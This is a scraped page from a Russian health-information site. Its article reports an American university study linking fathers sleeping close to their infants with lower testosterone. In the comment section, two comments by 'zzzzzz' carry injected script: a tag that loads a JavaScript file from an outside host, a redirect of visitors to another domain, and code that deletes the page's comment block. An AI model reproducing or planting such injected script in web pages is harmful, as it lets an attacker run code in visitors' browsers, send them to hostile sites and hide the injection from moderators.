Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем ближе к ребенку спит ...  >>  Чем ближе к ребенку спит папа, тем меньше тестостерона у него
 
Обратная связь
 

Чем ближе к ребенку спит папа, тем меньше тестостерона у него

Размер шрифта
21 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Хотите, чтобы ваш муж стал еще более заботливым отцом? Сделайте так, чтобы он спал бок-о-бок со своим малышом! Правда, мужественности у него от этого может поубавиться. К таким вот неоднозначным выводам, пришли ученые из Америки.

Чем ближе к ребенку спит папа, тем меньше тестостерона у него

Мужественность обуславливается уровнем гормона тестостерона. Именно он отвечает за мужской голос, формирование мышц, рост волос на подбородке и ногах. Но помимо внешних проявлений, тестостерон отвечает и за мужское поведение: риск, агрессия, секс, страсть.

Ранее было показано, что уровень тестостерона у отцов напрямую связан с их родительским поведением и, скажем так, вовлеченностью в процесс воспитания. Зависимость следующая: чем меньше тестостерона, тем более заботливый папа.

Исследование, о котором мы ведем речь, проводилось на базе университета Нотр-Дама. Ничего общего со знаменитым собором – университет расположен в городе Саут-Бенд, штат Индиана (США). Возглавил научную группу профессор Ли Геттлер.

Ученые отобрали группу из 362 новоиспеченных отцов и решили изучить, как влияют их ночные привычки на уровень тестостерона. Если говорить точнее – анализировалось взаиморасположение отца и ребенка во время сна – находилось ли чадо в одной комнате с папой или в разных, в своей кроватке или в супружеской постели, а в последнем случае – насколько близко к отцу.

Выяснилось, что у мужчин, которые предпочитали спать в обнимку со своими детьми, уровень тестостерона со временем несколько снижался.

Является ли это поводов навсегда отлучить дитя от супружеской кровати? Нам думается, что едва ли.

Другие секреты непростой родительской жизни раскрываются на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Рождение ребенка влияет на сексуальность пап так же, как на мам   Голос мужчины скажет, хочет он от вас детей или нет   Как быть здоровым ничего не делая   Почему вам кажется, что начальник злой?  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Первые шаги вашего малыша
Есть ли секс во время беременности?
Как повысить свою плодовитость

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.